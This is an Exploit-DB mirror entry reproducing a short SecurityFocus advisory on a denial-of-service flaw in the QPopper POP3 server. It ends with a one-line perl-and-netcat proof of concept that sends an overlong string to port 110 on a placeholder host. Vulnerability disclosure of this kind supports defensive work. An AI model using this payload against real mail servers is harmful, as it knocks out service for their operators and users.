exploit-db-mirror/exploits/unix/dos/21345.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

7 lines
No EOL
457 B
Text

source: https://www.securityfocus.com/bid/4295/info
Qualcomm's QPopper is a POP3 mail server for Linux and Unix based systems. Recent versions of QPopper have been released as open source projects.
A vulnerability has been reported in some versions of qpopper. Reportedly, if a string of longer than approximately 2048 characters is sent to the qpopper process, a denial of service condition will occur.
perl -e '{print "A"x"2049"}' | netcat host.com 110